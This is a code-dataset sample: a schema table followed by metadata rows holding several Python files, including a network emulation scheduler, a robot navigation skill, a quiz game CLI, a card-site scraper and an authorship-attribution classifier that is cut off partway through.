| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
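The schema is easiest to sanity-check programmatically. Below is a minimal sketch of filtering rows on these columns; it assumes the rows have been exported to a local Parquet file (the `sample.parquet` path and the threshold values are illustrative assumptions, not part of the dataset):

```python
import pandas as pd

# Hypothetical local export of the rows shown below; the file name is an assumption.
df = pd.read_parquet("sample.parquet")

# Keep Python files that look like hand-written, parseable code:
# mostly alphanumeric, not flagged as auto-generated, and with a valid AST.
# The 0.5 threshold is illustrative, not a value used by the dataset itself.
mask = (
    (df["lang"] == "Python")
    & (df["alphanum_fraction"] > 0.5)
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
    & (df["qsc_codepython_cate_ast_quality_signal"] == 1)
)

for _, row in df[mask].iterrows():
    print(row["hexsha"], row["max_stars_repo_name"], row["size"])
```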
---

- hexsha: a5582803ca69b47af8a599a971fe68204b6f9492
- size: 3,392; ext: py; lang: Python
- max_stars: apps/ndn_demoapps_wldr.py in theuerse/emulation_lib @ d9388202d7ec9283404f9ab4d2448ff19922b44f; licenses ["MIT"]; count 2; star events 2018-12-11T10:02:06.000Z to 2019-04-01T10:39:09.000Z
- max_issues: same path/repo/head; licenses ["MIT"]; count null; issue events null
- max_forks: same path/repo/head; licenses ["MIT"]; count null; fork events null
- content:
```python
import os

from .. import constants
from . import application


class NDN_DemoAppsWLDR(application.Application):
    def __init__(self, server, clients, gateways, start, duration, server_params, client_params, routingcmds):
        self.server = server
        self.clients = clients
        self.gateways = gateways
        self.startTime = start
        self.duration = duration
        self.server_params = server_params
        self.client_params = client_params

    def generateCommands(self, config):
        server_exe = "dashproducer"
        client_exe = "dashplayer_WLDR"
        # (sudo chrt -o -p 0 $BASHPID && dashplayer_WLDR --name /Node1/BBB_first100.mpd -r 12000 -l 500 -a buffer -o /home/nfd/emulation/results/consumer.log &) &
        wldr_daemon_cmd = "(sudo chrt -o -p 0 $BASHPID && wldrdaemon_udp -l /var/run/shm/nfd_packet_log/nfd_packet_log.csv"

        # start new server instance
        self.server.scheduleCmd(constants.SETUP_TIME, "sudo " + server_exe + " " + self.server_params.strip() + " &")
        # explicitly stop server at end of emulation
        self.server.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall " + server_exe)

        wlans = {}
        # add commands for clients
        for i in range(0, len(self.clients)):
            client = self.clients[i]
            gateway = self.gateways[i]
            client_accessPoint_ip = gateway.getEmuIP(config)
            if gateway not in wlans:
                wlans[gateway] = [client.getEmuIP(config)]
            else:
                wlans[gateway].append(client.getEmuIP(config))

            # start new client instance at begin of emulation
            output_path = os.path.join(config['REMOTE_RESULT_DIR'], "consumer.log")
            client.scheduleCmd(constants.SETUP_TIME, "sudo killall wldrdaemon_udp")
            client.scheduleCmd(constants.SETUP_TIME, "fuser -k 12345/udp")  # kill all applications occupying the UDP port 12345
            # schedule server-side wldr-instance to start
            client.scheduleCmd(self.startTime, wldr_daemon_cmd + " -d " + client_accessPoint_ip + " > demonlog.txt 2>&1 &) & ")
            client.addAppResult(output_path, os.path.join(config['RESULT_DIR'], "consumer_" + str(client.getId()) + ".log_%RUN%"))
            client.scheduleCmd(self.startTime, "(sudo chrt -o -p 0 $BASHPID && " + client_exe + " " + self.client_params + " -o " + output_path
                               + " > /home/nfd/dashplayerlog.txt 2>&1 &) &")
            # explicitly stop client at end of emulation
            client.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall " + client_exe)
            client.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall wldrdaemon_udp")
            client.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall tail")

        for accessPoint in wlans:
            client_str = " -i ".join(wlans[accessPoint])
            accessPoint.scheduleCmd(constants.SETUP_TIME, "sudo killall wldrdaemon_udp")
            accessPoint.scheduleCmd(constants.SETUP_TIME, "fuser -k 12345/udp ")
            accessPoint.scheduleCmd(constants.SETUP_TIME, wldr_daemon_cmd + " -i " + client_str + " > demonlog.txt 2>&1 &) &")
            accessPoint.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall wldrdaemon_udp")
            accessPoint.scheduleCmd(float(config["EMU_DURATION"]), "sudo killall tail")
```
- avg_line_length: 50.626866; max_line_length: 163; alphanum_fraction: 0.645047
- the 41 `*_quality_signal` columns, in schema order (qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal): 394, 3392, 5.393401, 0.296954, 0.041412, 0.070588, 0.081882, 0.349647, 0.326118, 0.249412, 0.228706, 0.053647, 0, 0, 0.014363, 0.240566, 3392, 66, 164, 51.393939, 0.810559, 0.127358, 0, 0, 0, 0.022727, 0.205015, 0.024737, 0, 0, 0, 0, 0, 1, 0.045455, false, 0, 0.068182, 0, 0.136364, 0
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a55b04ba7921f1a3ec26bc5a38d932e27524c9ac
- size: 1,918; ext: py; lang: Python
- max_stars: catoclient/commands/scheduletasks.py in cloudsidekick/catoclient @ 26907127e38d01f56959618263f4bf61e60784ee; licenses ["Apache-2.0"]; count 1; star events 2017-08-31T03:26:50.000Z to 2017-08-31T03:26:50.000Z
- max_issues: same path/repo/head; licenses ["Apache-2.0"]; count null; issue events null
- max_forks: same path/repo/head; licenses ["Apache-2.0"]; count null; fork events null
- content:
```python
#########################################################################
# Copyright 2011 Cloud Sidekick
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#########################################################################

import catoclient.catocommand
from catoclient.param import Param
import json


class ScheduleTasks(catoclient.catocommand.CatoCommand):
    Description = 'Schedules one or more Tasks using a json template file.'
    API = 'schedule_tasks'
    Examples = '''
    cato-schedule-tasks -s ./schedule_template.json
    '''
    Options = [Param(name='schedulefile', short_name='s', long_name='schedulefile',
                     optional=False, ptype='string',
                     doc='''The path to a json formatted schedule definition file. See the schedule_tasks API documentation for the format of the file.''')
               ]

    def main(self):
        try:
            # first, we need to load the schedule definition
            self.tasks = None
            if self.schedulefile:
                import os
                fn = os.path.expanduser(self.schedulefile)
                with open(fn, 'r') as f_in:
                    if not f_in:
                        print("Unable to open file [%s]." % fn)
                    self.tasks = f_in.read()

            results = self.call_api(self.API, ['tasks'])
            print(results)
        except Exception as ex:
            raise ex
```
- avg_line_length: 39.142857; max_line_length: 155; alphanum_fraction: 0.588634
- the 41 `*_quality_signal` columns, in schema order: 227, 1918, 4.933921, 0.537445, 0.053571, 0.023214, 0.028571, 0, 0, 0, 0, 0, 0, 0, 0.00563, 0.259124, 1918, 48, 156, 39.958333, 0.782548, 0.311262, 0, 0, 0, 0.037037, 0.264655, 0.02069, 0, 0, 0, 0, 0, 1, 0.037037, false, 0, 0.148148, 0, 0.37037, 0.074074
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a55cd95076293cb8d38f62d5a86be378db28011c
- size: 7,589; ext: py; lang: Python
- max_stars: highlevel_planning_ros/src/highlevel_planning_py/skills/navigate.py in ethz-asl/high_level_planning @ 094a73e993a6a9924f6ed067dcdbee70d1ead80e; licenses ["BSD-3-Clause"]; count null; star events null
- max_issues / max_forks: same path/repo/head; licenses ["BSD-3-Clause"]; counts and event dates null
- content:
```python
import pybullet as p
import numpy as np
from icecream import ic
from scipy.spatial.transform import Rotation as R

from highlevel_planning_py.tools.util import (
    homogenous_trafo,
    invert_hom_trafo,
    pos_and_orient_from_hom_trafo,
    SkillExecutionError,
)


class SkillNavigate:
    def __init__(self, scene, robot):
        self.robot_ = robot
        self.robot_uid_ = robot.model.uid
        self.scene_ = scene

    def _check_collisions(self):
        for _, obj in self.scene_.objects.items():
            temp = p.getClosestPoints(self.robot_uid_, obj.model.uid, distance=0.5)
            for elem in temp:
                contact_distance = elem[8]
                if contact_distance < 0.0:
                    # print("There is a collision")
                    return True
        return False

    def _move(self, pos, orient):
        p.resetBasePositionAndOrientation(
            self.robot_uid_, pos.tolist(), orient.tolist()
        )

    def move_to_object(self, target_name, nav_min_dist=None):
        target_id = self.scene_.objects[target_name].model.uid

        # Get the object position
        temp = p.getBasePositionAndOrientation(target_id)
        target_pos = np.array(temp[0])

        # Get valid nav angles
        nav_angle = self.scene_.objects[target_name].nav_angle
        if nav_min_dist is None:
            nav_min_dist = self.scene_.objects[target_name].nav_min_dist

        # Move there
        return self.move_to_pos(target_pos, nav_angle, nav_min_dist)

    def move_to_pos(self, target_pos, nav_angle=None, nav_min_dist=None):
        assert len(target_pos) == 3
        assert type(target_pos) is np.ndarray
        self.robot_.to_start()

        # Get robot position
        temp = p.getBasePositionAndOrientation(self.robot_uid_)
        robot_pos = np.array(temp[0])
        robot_orient = R.from_quat(temp[1])

        # Get position and orientation of any object in the robot hand w.r.t the robot base
        object_in_hand_uid = self._find_object_in_hand()
        T_rob_obj = self._get_object_relative_pose(
            object_in_hand_uid, robot_pos, robot_orient
        )

        if nav_angle is None:
            alphas = np.arange(0.0, 2.0 * np.pi, 2.0 * np.pi / 10.0)
        else:
            alphas = np.array([nav_angle])
        if nav_min_dist is None:
            radii = np.arange(0.4, 2.0, 0.05)
        else:
            radii = nav_min_dist + np.arange(0.4, 2.0, 0.05)

        # Iterate through points on circles around the target
        # First vary the radius
        for r in radii:
            # Then vary the angle
            for alpha in alphas:
                direction_vec = np.array([np.cos(alpha), np.sin(alpha), 0])
                robot_pos[:2] = target_pos[:2] + r * direction_vec[:2]
                rotation = R.from_euler("z", np.pi + alpha, degrees=False)
                robot_orient = rotation.as_quat()

                # Put robot into this position
                self._move(robot_pos, robot_orient)
                if not self._check_collisions():
                    # Move object into robot's hand
                    self._set_object_relative_pose(
                        object_in_hand_uid, robot_pos, robot_orient, T_rob_obj
                    )
                    return True
        return False

    def _find_object_in_hand(self):
        # Determine which object is in the robot's hand
        object_in_hand_uid = None
        object_in_hand_name = "nothing"
        for obj_name, obj in self.scene_.objects.items():
            temp = p.getClosestPoints(
                self.robot_uid_,
                obj.model.uid,
                distance=0.01,
                linkIndexA=self.robot_.link_name_to_index["panda_leftfinger"],
            )
            if len(temp) > 0:
                if object_in_hand_uid is not None:
                    ic("---")
                    ic(object_in_hand_name)
                    ic(obj_name)
                    raise SkillExecutionError(
                        "Don't know how to deal with more than one object in robot's hand"
                    )
                object_in_hand_uid = obj.model.uid
                object_in_hand_name = obj_name
        return object_in_hand_uid

    def _get_object_relative_pose(self, object_in_hand_uid, robot_pos, robot_orient):
        T_rob_obj = None
        if object_in_hand_uid is not None:
            # Get object position
            temp = p.getBasePositionAndOrientation(object_in_hand_uid)
            held_object_pos = np.array(temp[0])
            held_object_orient = R.from_quat(temp[1])

            # Compute object pose relative to robot
            r_O_O_obj = held_object_pos
            C_O_obj = held_object_orient
            T_O_obj = homogenous_trafo(r_O_O_obj, C_O_obj)
            r_O_O_rob = robot_pos
            C_O_rob = robot_orient
            T_O_rob = homogenous_trafo(r_O_O_rob, C_O_rob)
            T_rob_obj = np.matmul(invert_hom_trafo(T_O_rob), T_O_obj)

            # Check result
            T_test = np.matmul(T_O_rob, T_rob_obj)
            assert np.all(T_test - T_O_obj < 1e-12)
        return T_rob_obj

    def _set_object_relative_pose(
        self, object_in_hand_uid, robot_pos, robot_orient, T_rob_obj
    ):
        if object_in_hand_uid is not None:
            r_O_O_rob = robot_pos
            C_O_rob = R.from_quat(robot_orient)
            T_O_rob = homogenous_trafo(r_O_O_rob, C_O_rob)
            T_O_obj = np.matmul(T_O_rob, T_rob_obj)
            (held_object_pos, held_object_orient) = pos_and_orient_from_hom_trafo(
                T_O_obj
            )
            p.resetBasePositionAndOrientation(
                object_in_hand_uid,
                held_object_pos.tolist(),
                held_object_orient.tolist(),
            )


def get_nav_in_reach_description():
    action_name = "nav-in-reach"
    action_params = [
        ["current_pos", "navgoal"],
        ["goal_pos", "navgoal"],
        ["gid", "grasp_id"],
        ["rob", "robot"],
    ]
    action_preconditions = [
        ("at", True, ["current_pos", "rob"]),
        ("has-grasp", True, ["goal_pos", "gid"]),
    ]
    action_effects = [
        ("in-reach", True, ["goal_pos", "rob"]),
        ("in-reach", False, ["current_pos", "rob"]),
        ("at", True, ["goal_pos", "rob"]),
        ("at", False, ["current_pos", "rob"]),
    ]
    action_exec_ignore_effects = [
        ("at", False, ["current_pos", "rob"]),
        ("in-reach", False, ["current_pos", "rob"]),
    ]
    return (
        action_name,
        {
            "params": action_params,
            "preconds": action_preconditions,
            "effects": action_effects,
            "exec_ignore_effects": action_exec_ignore_effects,
        },
    )


def get_nav_at_description():
    action_name = "nav-at"
    action_params = [
        ["current_pos", "navgoal"],
        ["goal_pos", "navgoal"],
        ["rob", "robot"],
    ]
    action_preconditions = [("at", True, ["current_pos", "rob"])]
    action_effects = [
        ("at", True, ["goal_pos", "rob"]),
        ("at", False, ["current_pos", "rob"]),
        ("in-reach", False, ["current_pos", "rob"]),
    ]
    action_exec_ignore_effects = [
        ("at", False, ["current_pos", "rob"]),
        ("in-reach", False, ["current_pos", "rob"]),
    ]
    return (
        action_name,
        {
            "params": action_params,
            "preconds": action_preconditions,
            "effects": action_effects,
            "exec_ignore_effects": action_exec_ignore_effects,
        },
    )
```
- avg_line_length: 34.339367; max_line_length: 91; alphanum_fraction: 0.573593
- the 41 `*_quality_signal` columns, in schema order: 966, 7589, 4.15528, 0.182195, 0.03986, 0.053812, 0.04858, 0.486049, 0.41156, 0.375934, 0.349527, 0.270553, 0.238166, 0, 0.008777, 0.324417, 7589, 220, 92, 34.495455, 0.774137, 0.060087, 0, 0.288136, 0, 0, 0.07461, 0, 0, 0, 0, 0, 0.016949, 1, 0.056497, false, 0, 0.028249, 0, 0.141243, 0
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a569dd73bf4c737b5da9b60bab3083b5192099d3
- size: 5,151; ext: py; lang: Python
- max_stars: weakest_link/game.py in jmattfong/weakest-link @ c4dba2b51a7271b83d3cc14b1329836805019671; licenses ["Apache-2.0"]; count null; star events null
- max_issues / max_forks: same path/repo/head; licenses ["Apache-2.0"]; counts and event dates null
- content:
```python
from weakest_link.util import wait_for_choice, green, red, dollars, get_random_mean_word, starts_with_vowel, format_time


class WeakestLinkGame :
    def __init__(self, players, rounds, final_round) :
        self.players = players
        self.rounds = rounds
        self.final_round = final_round
        self.total_bank = 0
        self.maximum_bank = 0
        self.current_round = 0

    # For the API

    def get_current_round(self) :
        return self.rounds[self.current_round] if self.current_round < len(self.rounds) else self.final_round

    def get_current_round_name(self) :
        return self.get_current_round().get_name()

    def get_players(self) :
        return self.players

    def get_current_bank(self, color=True) :
        if self.current_round >= len(self.rounds) :
            return 0
        return dollars(self.get_current_round().round_bank, color=color)

    def get_total_bank(self, color=True) :
        return dollars(self.total_bank, color=False)

    def get_bank_links(self) :
        if self.current_round >= len(self.rounds) :
            return []
        return [dollars(link, color=False) for link in self.get_current_round().bank_links]

    def get_current_link(self) :
        if self.current_round >= len(self.rounds) :
            return 0
        return self.get_current_round().current_link

    def get_current_player_num(self) :
        if self.current_round >= len(self.rounds) :
            return 0
        return self.get_current_round().get_current_player_num()

    def get_time_remaining(self) :
        if self.current_round >= len(self.rounds) :
            return 0
        time = self.get_current_round().seconds_remaining
        time = time if time > 0 else 0
        return format_time(time)

    # For the CLI

    def run(self) :
        first_player = self.players[0]
        for i in range(len(self.rounds)) :
            self.current_round = i
            if len(self.players) == 2 :
                print("Not running all rounds since we don't have enough players")
                print()
                break
            if i != 0 :
                print('As the strongest link last round,', green(first_player), 'will go first')
                print()
            round = self.rounds[i]
            self.try_to_start_round(i+1, round, first_player)
            first_player = self.handle_finished_round_results(round)
            if self.current_round < 2 :
                print('Not voting off weakest link since we are on round', self.current_round+1)
                weakest_link = None
            elif self.current_round == 2 :
                print(red('Time to vote off multiple players!'))
                weakest_link = self.vote_for_weakest_link()
                weakest_link = self.vote_for_weakest_link()
                weakest_link = self.vote_for_weakest_link()
            else :
                weakest_link = self.vote_for_weakest_link()
            if first_player == weakest_link :
                first_player = round.get_strongest_link(first_player)

        self.current_round = len(self.rounds)
        while len(self.players) > 2 :
            weakest_link = self.vote_for_weakest_link()
            if first_player == weakest_link :
                first_player = round.get_strongest_link(first_player)

        first_player = wait_for_choice('As the strongest link last round, ' + green(first_player) + ' chooses who will go first in the ' +
                                       red('final round') + '. Choices: ' + ", ".join(self.players) + ' > ', self.players)
        self.try_to_start_round('Final', self.final_round, first_player)
        print(green(str(self.final_round.winner) + ' is the winner! They win ' + dollars(self.total_bank)))
        print()
        print("Game over, goodnight!")

    # Helpers

    def try_to_start_round(self, round_num, round, first_player) :
        wait_for_choice("Enter 'S' to start round " + str(round_num) + " > ", 'S')
        print('Starting round', round_num)
        print()
        round.start_round(self.players, first_player)
        print('Finished round', round_num)
        print()

    def handle_finished_round_results(self, round) :
        # TODO determine next first player and total bank
        self.total_bank += round.round_bank
        self.maximum_bank += round.bank_links[-1]
        strongest_link = round.get_strongest_link()
        print('That round the team banked', dollars(round.round_bank))
        adjective = get_random_mean_word()
        print('Out of a possible', dollars(self.maximum_bank), "the team banked", 'an' if starts_with_vowel(adjective) else 'a', adjective, dollars(self.total_bank))
        print('Statistically, the', green('strongest link'), 'was', green(strongest_link))
        print('Statistically, the', red('weakest link'), 'was', red(round.get_weakest_link()))
        print()
        return strongest_link

    def vote_for_weakest_link(self) :
        weakest_link = wait_for_choice("Who is the weakest link? Choices: " + ', '.join(self.players) + " > ", self.players)
        self.players.remove(weakest_link)
        return weakest_link
```
- avg_line_length: 40.559055; max_line_length: 165; alphanum_fraction: 0.628422
- the 41 `*_quality_signal` columns, in schema order: 665, 5151, 4.613534, 0.180451, 0.078879, 0.067797, 0.041069, 0.340939, 0.264342, 0.244785, 0.210561, 0.210561, 0.169166, 0, 0.004804, 0.272568, 5151, 126, 166, 40.880952, 0.813985, 0.015337, 0, 0.244898, 0, 0, 0.109927, 0, 0, 0, 0, 0.007937, 0, 1, 0.142857, false, 0, 0.010204, 0.040816, 0.326531, 0.183673
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a56b8b89c70b03cbae514c630dd4557886c37a12
- size: 1,338; ext: py; lang: Python
- max_stars: infiltrate/models/card/expedition.py in Qazzquimby/eternalCardEvaluator @ ef8640ed819a89e5198f8aedf0861a29c57c5720; licenses ["MIT"]; count 4; star events 2019-04-08T09:30:10.000Z to 2020-09-15T19:25:30.000Z
- max_issues: same path/repo/head; licenses ["MIT"]; count 19; issue events 2019-04-09T19:02:14.000Z to 2020-12-25T05:22:45.000Z
- max_forks: same path/repo/head; licenses ["MIT"]; count null; fork events null
- content:
```python
import typing as t

import infiltrate.browsers as browsers
import infiltrate.eternal_warcy_cards_browser as ew_cards
import infiltrate.models.card as card_mod
from infiltrate import db


def update_is_in_expedition():
    """Sets the is_in_expedition column of the cards table
    to match Eternal Warcry readings."""
    card_mod.Card.query.update({"is_in_expedition": False})
    expedition_card_ids = _get_expedition_card_ids()
    for card_id in expedition_card_ids:
        card_mod.Card.query.filter(
            card_mod.Card.set_num == card_id.set_num,
            card_mod.Card.card_num == card_id.card_num,
        ).update({"is_in_expedition": True})
    db.session.commit()


def _get_expedition_card_ids() -> t.List[card_mod.CardId]:
    expedition_id = _get_expedition_id()
    root_url = ew_cards.get_ew_cards_root_url(expedition_id=expedition_id)
    return ew_cards.get_card_ids_in_search(root_url)


def _get_expedition_id():
    card_url = "https://eternalwarcry.com/cards"
    most_recent_expedition_selector = "#Expedition > option:nth-child(2)"
    element = browsers.get_first_element_from_url_and_selector(
        url=card_url, selector=most_recent_expedition_selector
    )
    expedition_id = element.attrs["value"]
    return expedition_id


if __name__ == "__main__":
    result = _get_expedition_card_ids()
```
- avg_line_length: 32.634146; max_line_length: 74; alphanum_fraction: 0.750374
- the 41 `*_quality_signal` columns, in schema order: 193, 1338, 4.751295, 0.34715, 0.091603, 0.092694, 0.065431, 0.082879, 0, 0, 0, 0, 0, 0, 0.000891, 0.161435, 1338, 40, 75, 33.45, 0.816399, 0.063528, 0, 0, 0, 0, 0.087691, 0, 0, 0, 0, 0, 0, 1, 0.107143, false, 0, 0.178571, 0, 0.357143, 0
- the plain qsc_* columns: all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null
- effective: 1; hits: 0
---

- hexsha: a56e7c7d3eb512b85fa07082bf02be47726e19fd
- size: 8,373; ext: py; lang: Python
- max_stars: attribution/authorship_pipeline/classifiers/BaseClassifier.py in yangzhou6666/authorship-detection @ f28701dea256da70eb8ba216c2572e1975c99b54; licenses ["MIT"]; count 14; star events 2020-10-26T06:05:55.000Z to 2022-03-08T08:32:17.000Z
- max_issues: same path/repo/head; licenses ["MIT"]; count 10; issue events 2020-02-29T16:55:20.000Z to 2021-11-06T10:40:32.000Z
- max_forks: same path/repo/head; licenses ["MIT"]; count 4; fork events 2021-07-28T12:27:46.000Z to 2021-10-04T18:12:33.000Z
- content:
```python
from collections import namedtuple
from math import ceil
from typing import Tuple, Dict, Union, List, Counter

import numpy as np
import pandas as pd

from classifiers.config import Config
from data_loading.PathMinerDataset import PathMinerDataset
from data_loading.PathMinerLoader import PathMinerLoader
from data_loading.PathMinerSnapshotLoader import PathMinerSnapshotLoader
from preprocessing.context_split import PickType, ContextSplit
from util import ProcessedFolder, ProcessedSnapshotFolder

ClassificationResult = namedtuple(
    'ClassificationResult',
    ('accuracy', 'macro_precision', 'macro_recall', 'fold_ind')
)


def compute_classification_result(
        true_labels: List, predicted_labels: List, fold_ind: Union[int, Tuple[int, int]]
) -> ClassificationResult:
    """
    Compute metric values (accuracy, precision, recall), given the predictions.
    :param true_labels: true authors
    :param predicted_labels: model's predictions
    :param fold_ind: index that is used to refer to the fold in cross-validation
    :return: an instance of ClassificationResult that contains the computed metric values
    """
    true_labels = np.array(true_labels, dtype=np.int)
    predicted_labels = np.array(predicted_labels, dtype=np.int)
    labels, counts = np.unique(true_labels, return_counts=True)
    tp, fp, tn, fn = 0, 0, 0, 0
    precisions = []
    recalls = []
    # print('===========')
    # for true_label, predicted_label in zip(true_labels, predicted_labels):
    #     if true_label != predicted_label:
    #         print(f'true: {true_label} predicted: {predicted_label}')
    # print('===========')
    for label, count in zip(labels, counts):
        true_positive = np.sum(np.logical_and(true_labels == label, predicted_labels == label))
        false_positive = np.sum(np.logical_and(true_labels != label, predicted_labels == label))
        true_negative = np.sum(np.logical_and(true_labels != label, predicted_labels != label))
        false_negative = np.sum(np.logical_and(true_labels == label, predicted_labels != label))
        tp += true_positive
        fp += false_positive
        tn += true_negative
        fn += false_negative
        precisions.append(tp / (tp + fp) if (tp + fp > 0) else 0.)
        recalls.append(tp / (tp + fn))
    return ClassificationResult(
        accuracy=np.mean(true_labels == predicted_labels),
        macro_precision=np.mean(precisions),
        macro_recall=np.mean(recalls),
        fold_ind=fold_ind
    )


class BaseClassifier:
    """
    Base class for all classifiers that handles correct setup of data loading, data splitting, and cross-validation.
    """

    def __init__(self, config: Config, project_folder: Union[ProcessedFolder, ProcessedSnapshotFolder],
                 change_entities: pd.Series, change_to_time_bucket: Dict, min_max_count: Tuple[int, int],
                 author_occurrences: Counter, context_splits: List[ContextSplit]):
        self.config = config
        self.__fix_random()
        if config.mode() == "snapshot":
            self._loader = PathMinerSnapshotLoader(project_folder)
        else:
            self._loader = PathMinerLoader(
                project_folder, change_entities, change_to_time_bucket, min_max_count, author_occurrences,
                context_splits
            )
        self.__indices_per_class, self._n_classes = self.__split_into_classes()
        self.update_chosen_classes()
        self.models = {}

    def __fix_random(self):
        np.random.seed(self.config.seed())
        self.__seed = self.config.seed()

    def __split_into_classes(self) -> Tuple[np.ndarray, int]:
        """
        Computes indices that belong to each class (author).
        """
        print("Splitting into classes")
        index = self._loader.labels()
        n_classes = self._loader.n_classes()
        indices_per_class = [[] for _ in range(n_classes)]
        for i, ind in enumerate(index):
            indices_per_class[ind].append(i)
        indices_per_class = np.array([np.array(inds, dtype=np.int32) for inds in indices_per_class])
        # for k in range(n_classes):
        #     np.random.shuffle(indices_per_class[k])
        return indices_per_class, n_classes

    def update_chosen_classes(self):
        """
        For evaluation on the data from a subset of authors, this method re-samples the picked authors.
        If all the authors should be used, it keeps selecting the complete set of authors.
        """
